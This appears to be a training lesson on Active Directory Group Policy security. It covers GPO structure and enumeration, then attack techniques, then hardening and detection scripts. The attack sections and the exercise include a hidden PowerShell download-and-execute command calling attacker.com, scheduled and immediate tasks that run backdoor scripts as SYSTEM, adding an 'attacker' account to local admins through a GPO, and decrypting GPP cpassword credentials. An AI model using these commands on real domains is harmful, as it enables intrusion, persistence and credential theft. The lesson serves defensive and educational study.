Lesson 3: Group Policy Security
Understanding Group Policy security, enumeration techniques, and exploitation methods
Learning Objectives
By the end of this lesson, you will be able to:
- Understand Group Policy architecture and components
- Master GPO enumeration and analysis techniques
- Identify Group Policy security vulnerabilities
- Execute Group Policy exploitation attacks
- Analyze Group Policy Objects for sensitive information
- Implement Group Policy security countermeasures
Group Policy Architecture
What is Group Policy?
Group Policy is a feature of Microsoft Windows that provides centralized management and configuration of operating systems, applications, and users' settings in an Active Directory environment. It allows administrators to define security policies, software installation, and system configurations across multiple computers.
Group Policy Key Components:
- Group Policy Objects (GPOs): Containers for policy settings
- Group Policy Container (GPC): AD objects storing GPO metadata (under CN=Policies,CN=System)
- Group Policy Template (GPT): File system storage for policy files (under SYSVOL)
- SYSVOL: Shared folder, replicated to every domain controller, that holds the policy templates
Group Policy Structure
GPO Storage Locations:
Active Directory Domain
└── CN=Policies,CN=System,DC=domain,DC=com
    └── CN={GPO-GUID}
        ├── CN=Machine (Computer Configuration)
        └── CN=User (User Configuration)

File System (SYSVOL)
└── \\domain.com\SYSVOL\domain.com\Policies\
    └── {GPO-GUID}/
        ├── MACHINE/
        │   ├── Registry.pol
        │   ├── Scripts/
        │   └── Preferences/
        └── USER/
            ├── Registry.pol
            ├── Scripts/
            └── Preferences/
Group Policy Processing
Policy Processing Order
- Local Group Policy - Computer and user local policies
- Site Policies - Site-linked GPOs
- Domain Policies - Domain-linked GPOs
- OU Policies - OU-linked GPOs (nested OUs processed from parent to child)
Policies are applied in this order (local, site, domain, OU), so when two settings conflict the one applied later wins unless an earlier link is enforced.
Policy Processing Modes
- Merge Mode: Combine all applicable policies
- Replace Mode: Replace previous policy settings
- No Override: Prevent child policies from overriding
- Block Inheritance: Prevent parent policies from applying
Group Policy Enumeration
GPO Discovery Techniques
PowerShell Enumeration
Native PowerShell commands for GPO enumeration
Basic GPO Enumeration:
# Get all GPOs in the domain
Get-GPO -All | Select-Object DisplayName, Id, CreationTime
# Get all GPOs of a specific domain, querying a specific domain controller
# (Get-GPO needs -All, -Name or -Guid; it cannot filter by OU link on its own)
Get-GPO -All -Domain "domain.com" -Server "dc.domain.com"
# Get the full settings report of one GPO as XML
Get-GPO -Name "Default Domain Policy" | Get-GPOReport -ReportType XML
LDAP Enumeration
Direct LDAP queries for GPO information
LDAP Queries:
# Find all GPOs (-x selects a simple bind, which the -D/-W credentials require)
ldapsearch -x -H ldap://domain.com -D "user@domain.com" -W -b "CN=Policies,CN=System,DC=domain,DC=com" "(objectClass=groupPolicyContainer)"
# Get the details of one GPO container
ldapsearch -x -H ldap://domain.com -D "user@domain.com" -W -b "CN={GPO-GUID},CN=Policies,CN=System,DC=domain,DC=com"
SYSVOL Enumeration
Direct file system enumeration of SYSVOL
SYSVOL Access:
# List GPO directories
ls \\domain.com\SYSVOL\domain.com\Policies\
# Access GPO files
cat \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\MACHINE\Registry.pol
# Check for scripts
ls \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\MACHINE\Scripts\
Automated GPO Enumeration Tools
PowerView
PowerShell-based GPO enumeration
Key Functions:
- Get-NetGPO - Enumerate GPOs
- Get-NetGPOGroup - Get GPO groups
- Get-NetGPOLocalGroup - Get local groups
- Get-ObjectAcl - Get GPO permissions
Grouper2
Automated GPO analysis and reporting
Key Features:
- Automated GPO enumeration
- Security policy analysis
- HTML report generation
- Vulnerability identification
SharpGPOAbuse
C# tool for GPO abuse and exploitation
Key Capabilities:
- GPO enumeration
- Immediate task creation
- Scheduled task abuse
- Local admin addition
Group Policy Security Vulnerabilities
Common GPO Attack Vectors
Weak GPO Permissions
Insufficient access controls on Group Policy Objects
Permission Issues:
- Authenticated Users with Edit rights
- Domain Users with Modify permissions
- Everyone group with full control
- Missing deny permissions
Impact:
- GPO modification and abuse
- Local admin privilege escalation
- Persistent backdoor installation
- Domain-wide configuration changes
Script Deployment
Malicious script deployment through GPOs
Script Types:
- Startup/shutdown scripts
- Logon/logoff scripts
- Scheduled task scripts
- Immediate task scripts
Impact:
- Code execution on target systems
- Persistence mechanisms
- Lateral movement facilitation
- Data exfiltration
Credential Storage
Plaintext credentials stored in GPOs
Credential Storage Locations:
- Group Policy Preferences
- Local user creation
- Service account configuration
- Registry key modifications
Impact:
- Credential theft and reuse
- Privilege escalation
- Lateral movement
- Domain compromise
Registry Modifications
Malicious registry changes through GPOs
Registry Abuses:
- Auto-logon credentials
- Security policy bypasses
- Service configuration changes
- System hardening removal
Impact:
- Security control bypass
- System configuration changes
- Persistence mechanisms
- Defense evasion
Group Policy Exploitation Techniques
GPO Abuse Methods
Local Admin Addition
Adding users to local administrators group via GPO
Attack Steps:
- Identify GPOs with weak permissions
- Modify GPO to add user to local admins
- Wait for policy refresh or force update
- Access target systems with admin rights
PowerShell Implementation:
# Add user to local administrators
New-GPO -Name "Malicious Policy"
Set-GPRegistryValue -Name "Malicious Policy" -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Groups" -ValueName "S-1-5-32-544" -Value "attacker"
Malicious Script Deployment
Deploying backdoors through GPO scripts
Attack Steps:
- Create malicious script payload
- Upload script to SYSVOL
- Configure GPO to execute script
- Target specific OUs or computers
Script Example:
# Malicious PowerShell script
powershell.exe -WindowStyle Hidden -Command "IEX (New-Object Net.WebClient).DownloadString('http://attacker.com/payload.ps1')"
# Scheduled task creation
schtasks /create /tn "Update" /tr "powershell.exe -ep bypass -f \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Scripts\Startup\backdoor.ps1" /sc onstart /ru SYSTEM
Credential Harvesting
Extracting stored credentials from GPOs
Attack Steps:
- Enumerate GPOs for credential storage
- Access Group Policy Preferences files
- Decrypt stored credentials
- Use credentials for lateral movement
Credential Extraction:
# Find GPOs with stored credentials
Get-GPO -All | Get-GPOReport -ReportType XML | Select-String "cpassword"
# Decrypt cpassword using gpp-decrypt
gpp-decrypt "cpassword_value"
# Extract from registry files
Get-Content "\\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Registry.pol"
Immediate Task Abuse
Creating immediate tasks for code execution
Attack Steps:
- Create GPO with immediate task
- Configure task to run malicious command
- Link GPO to target OU
- Trigger policy update
Immediate Task Creation:
# Using SharpGPOAbuse
SharpGPOAbuse.exe --AddImmediateTask --TaskName "Update" --Author "NT AUTHORITY\SYSTEM" --Command "cmd.exe" --Arguments "/c powershell.exe -ep bypass -f \\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Scripts\backdoor.ps1" --GPOName "Malicious Policy"
Group Policy Security Countermeasures
Defense Strategies
Permission Hardening
Implementation:
- Remove Authenticated Users from GPO permissions
- Grant Edit rights only to authorized administrators
- Implement least privilege access
- Use security groups for GPO management
- Regular permission audits
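The audit behind the "Weak GPO Permissions" vector above and the permission-hardening steps just listed, as an added example that is not part of the original lesson: it walks every GPO, flags broad trustees holding edit rights, and offers a remediation function. It assumes the GroupPolicy (RSAT) module in a domain-joined session; the trustee list is the set of well-known broad groups.

```powershell
# Added example (not from the lesson): audit GPOs for broad trustees with edit rights.
# Assumes the GroupPolicy module (RSAT) and a domain-joined session.
Import-Module GroupPolicy

$BroadTrustees = @('Authenticated Users', 'Domain Users', 'Everyone', 'Domain Computers')
$EditLevels    = @('GpoEdit', 'GpoEditDeleteModifySecurity')

function Find-WeakGpoPermission {
    # One record per (GPO, trustee) pair where a broad trustee can change the policy
    foreach ($gpo in Get-GPO -All) {
        foreach ($p in Get-GPPermission -Guid $gpo.Id -All -Domain $gpo.DomainName) {
            if ($p.Denied) { continue }   # an explicit deny is not a weakness
            $trustee = $p.Trustee.Name
            if ($BroadTrustees -contains $trustee -and $EditLevels -contains $p.Permission.ToString()) {
                [pscustomobject]@{
                    GpoName    = $gpo.DisplayName
                    GpoId      = $gpo.Id
                    Trustee    = $trustee
                    Permission = $p.Permission
                    Modified   = $gpo.ModificationTime
                }
            }
        }
    }
}

function Repair-WeakGpoPermission {
    # Authenticated Users is reduced to Apply (policy still processes and computers keep
    # the Read that MS16-072 requires); any other broad trustee loses all rights.
    param([Parameter(ValueFromPipeline)] $Finding)
    process {
        $args = @{ Guid = $Finding.GpoId; TargetName = $Finding.Trustee; TargetType = 'Group' }
        if ($Finding.Trustee -eq 'Authenticated Users') {
            Set-GPPermission @args -PermissionLevel GpoApply -Replace
        } else {
            Set-GPPermission @args -PermissionLevel None
        }
        "$($Finding.GpoName): $($Finding.Trustee) edit rights removed"
    }
}

# Report first; uncomment the last line only after reviewing the findings
$findings = Find-WeakGpoPermission
$findings | Format-Table -AutoSize
# $findings | Repair-WeakGpoPermission
```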
Monitoring & Logging
Implementation:
- Enable GPO change auditing
- Monitor SYSVOL file changes
- Track GPO linking and unlinking
- Alert on suspicious GPO modifications
- Implement SIEM integration
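The GPO change monitoring described in the list above, as an added example that is not part of the original lesson: it reads the Directory Service Changes events (5136 modified, 5137 created, 5141 deleted) from a domain controller, keeps only GPO objects and gPLink changes, and warns when the actor is outside an allowed admin group. It assumes that auditing subcategory is enabled with a SACL on the Policies container, the ActiveDirectory module for the group lookup, and placeholder names for the DC and the admin group.

```powershell
# Added example (not from the lesson): surface who created, changed or linked GPOs.
# Assumes "Directory Service Changes" auditing is on; dc.domain.com and "GPO Admins" are placeholders.
param([string]$DomainController = 'dc.domain.com', [int]$Hours = 24)

$eventMap = @{ 5137 = 'Created'; 5136 = 'Modified'; 5141 = 'Deleted' }

function Get-GpoChangeEvent {
    param([string]$Computer, [int]$Hours)
    $filter = @{ LogName = 'Security'; Id = 5136, 5137, 5141; StartTime = (Get-Date).AddHours(-$Hours) }
    foreach ($ev in Get-WinEvent -ComputerName $Computer -FilterHashtable $filter -ErrorAction SilentlyContinue) {
        # Flatten the EventData fields (SubjectUserName, ObjectDN, ObjectClass, ...) into a hashtable
        $data = @{}
        ([xml]$ev.ToXml()).Event.EventData.Data | ForEach-Object { $data[$_.Name] = $_.'#text' }
        # 5136 also fires for gPLink edits on OU/domain/site objects, which is how a GPO gets linked
        $isGpo  = $data['ObjectClass'] -eq 'groupPolicyContainer'
        $isLink = $data['AttributeLDAPDisplayName'] -eq 'gPLink'
        if (-not ($isGpo -or $isLink)) { continue }
        [pscustomobject]@{
            Time      = $ev.TimeCreated
            Action    = if ($isLink) { 'LinkChanged' } else { $eventMap[[int]$ev.Id] }
            Actor     = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
            Object    = $data['ObjectDN']
            Attribute = $data['AttributeLDAPDisplayName']
            Value     = $data['AttributeValue']
        }
    }
}

$changes = Get-GpoChangeEvent -Computer $DomainController -Hours $Hours
$changes | Sort-Object Time | Format-Table -AutoSize

# Alerting rule: any GPO change by someone outside the dedicated admin group is suspicious
$members = Get-ADGroupMember -Identity 'GPO Admins' -Recursive | Select-Object -ExpandProperty SamAccountName
$changes | Where-Object { ($_.Actor -split '\\')[-1] -notin $members } |
    ForEach-Object { Write-Warning "Unexpected GPO change by $($_.Actor): $($_.Action) $($_.Object)" }
```

Feed the same filter to a SIEM collector to get the alert continuously rather than on a schedule.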
Script Security
Implementation:
- Digitally sign all GPO scripts
- Implement script execution policies
- Use AppLocker for script control
- Regular script content reviews
- Secure script storage locations
Credential Protection
Implementation:
- Avoid storing credentials in GPOs
- Use Group Managed Service Accounts
- Implement credential encryption
- Regular credential audits
- Use secure credential management solutions
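A credential audit covering the "Credential Storage" and "Registry Modifications" vectors above and the credential-protection steps just listed, as an added example that is not part of the original lesson: it scans the SYSVOL policy templates for Group Policy Preferences entries carrying a cpassword attribute and for Registry.pol values that set auto-logon credentials, and reports where they are without decrypting anything. It assumes read access to SYSVOL; the share path is a placeholder, and the Registry.pol record layout used is the documented "PReg" format.

```powershell
# Added example (not from the lesson): find stored credentials in SYSVOL policy templates.
# Assumes read access to the share; the default path is a placeholder.
param([string]$PoliciesPath = '\\domain.com\SYSVOL\domain.com\Policies')

# Registry.pol value names that carry a secret or turn on automatic logon
$SensitiveRegValues = @('DefaultPassword', 'AltDefaultPassword', 'AutoAdminLogon')

function Get-RegistryPolValueName {
    # Registry.pol = 'PReg' + 4-byte version, then UTF-16LE records [key\0;value\0;type;size;data]
    param([string]$Path)
    $bytes = [System.IO.File]::ReadAllBytes($Path)
    if ($bytes.Length -lt 8 -or [Text.Encoding]::ASCII.GetString($bytes, 0, 4) -ne 'PReg') { return }
    $body = [Text.Encoding]::Unicode.GetString($bytes, 8, $bytes.Length - 8)
    foreach ($m in [regex]::Matches($body, '\[([^\x00;\]]+)\x00;([^\x00;\]]*)\x00;')) {
        [pscustomobject]@{ Key = $m.Groups[1].Value; ValueName = $m.Groups[2].Value }
    }
}

function Find-SysvolSecret {
    param([string]$Root)
    foreach ($gpoDir in Get-ChildItem -Path $Root -Directory) {
        # Any GPP XML (Groups, Services, ScheduledTasks, DataSources, Drives, Printers) may carry cpassword
        foreach ($xmlFile in Get-ChildItem -Path $gpoDir.FullName -Recurse -Filter *.xml -File) {
            try { [xml]$doc = Get-Content -Path $xmlFile.FullName -Raw } catch { continue }
            foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
                $who = @('userName', 'accountName', 'runAs') |
                    ForEach-Object { $node.GetAttribute($_) } | Where-Object { $_ } | Select-Object -First 1
                [pscustomobject]@{ Gpo = $gpoDir.Name; File = $xmlFile.FullName; Finding = 'GPP cpassword'; Detail = $who }
            }
        }
        # Registry.pol values that configure Winlogon auto-logon leak the password in clear text
        foreach ($pol in Get-ChildItem -Path $gpoDir.FullName -Recurse -Filter Registry.pol -File) {
            foreach ($entry in Get-RegistryPolValueName -Path $pol.FullName) {
                if ($SensitiveRegValues -contains $entry.ValueName) {
                    [pscustomobject]@{ Gpo = $gpoDir.Name; File = $pol.FullName; Finding = 'Registry.pol'; Detail = "$($entry.Key)\$($entry.ValueName)" }
                }
            }
        }
    }
}

Find-SysvolSecret -Root $PoliciesPath | Format-Table -AutoSize
```

Every hit is a credential to rotate and a preference item to replace with a gMSA or LAPS; the cpassword key is public, so presence alone is the finding.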
Security Configuration
GPO Security Settings
# Remove Authenticated Users' rights from a GPO
# Caution: since MS16-072 computer accounts need Read on every GPO; if Authenticated Users
# loses Read, grant "Domain Computers" GpoRead or user policy processing breaks
Set-GPPermission -Name "GPO Name" -TargetName "Authenticated Users" -TargetType Group -PermissionLevel None
# Grant edit rights only to the dedicated admin group
Set-GPPermission -Name "GPO Name" -TargetName "GPO Admins" -TargetType Group -PermissionLevel GpoEdit
# Enable GPO change auditing: events 5136/5137/5141 come from the "Directory Service Changes"
# subcategory ("DS Access" is the category, not a subcategory) and need a SACL on CN=Policies
auditpol /set /subcategory:"Directory Service Changes" /success:enable /failure:enable
SYSVOL Security
# Set SYSVOL permissions
icacls "\\domain.com\SYSVOL" /grant "Domain Admins:(OI)(CI)F" /T
icacls "\\domain.com\SYSVOL" /grant "Enterprise Admins:(OI)(CI)F" /T
# Caution: domain members read SYSVOL to apply policy, so Authenticated Users (or Domain
# Computers) must keep Read; restrict Write, not Read, or Group Policy stops applying
icacls "\\domain.com\SYSVOL" /remove "Authenticated Users"
# Enable file system auditing (also set a SACL on the Policies folder so 4663 events are written)
auditpol /set /subcategory:"File System" /success:enable /failure:enable
Hands-On Exercise
Exercise: Group Policy Security Assessment
Objective: Perform comprehensive GPO enumeration, identify security vulnerabilities, and demonstrate exploitation techniques.
Steps:
- GPO Enumeration
  Enumerate all Group Policy Objects:
  # PowerShell enumeration
  Get-GPO -All | Select-Object DisplayName, Id, CreationTime, ModificationTime
  # Get GPO details
  Get-GPO -Name "Default Domain Policy" | Get-GPOReport -ReportType XML
  # Check GPO permissions
  Get-GPPermission -Name "Default Domain Policy" -All
- SYSVOL Enumeration
  Examine SYSVOL for sensitive information:
  # List all GPO directories
  ls \\domain.com\SYSVOL\domain.com\Policies\
  # Check for scripts
  Get-ChildItem \\domain.com\SYSVOL\domain.com\Policies\*\Machine\Scripts\ -Recurse
  # Search for credentials
  Get-ChildItem \\domain.com\SYSVOL\domain.com\Policies\*\Machine\ -Recurse | Select-String "cpassword"
- Vulnerability Assessment
  Identify GPO security issues:
  # Check for weak permissions
  Get-GPPermission -Name "Default Domain Policy" -All | Where-Object {$_.Trustee.Name -eq "Authenticated Users"}
  # Look for stored credentials
  Get-GPO -All | Get-GPOReport -ReportType XML | Select-String "cpassword"
  # Check for immediate tasks
  Get-GPO -All | Get-GPOReport -ReportType XML | Select-String "ImmediateTask"
- Exploitation Demonstration
  Demonstrate GPO abuse techniques:
  # Create malicious GPO (if permissions allow)
  New-GPO -Name "Security Update"
  # Add user to local administrators
  Set-GPRegistryValue -Name "Security Update" -Key "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Groups" -ValueName "S-1-5-32-544" -Value "attacker"
  # Link GPO to OU
  New-GPLink -Name "Security Update" -Target "OU=Computers,DC=domain,DC=com"
- Credential Extraction
  Extract stored credentials from GPOs:
  # Use gpp-decrypt for credential extraction
  gpp-decrypt "cpassword_here"
  # Parse XML files for credentials
  [xml]$xml = Get-Content "\\domain.com\SYSVOL\domain.com\Policies\{GPO-GUID}\Machine\Preferences\Groups\Groups.xml"
  $xml.Groups.User.Properties | Select-Object Username, NewName, cpassword
Deliverables:
- GPO enumeration report
- Vulnerability assessment findings
- Extracted credentials (if found)
- Exploitation demonstration results
- Security recommendations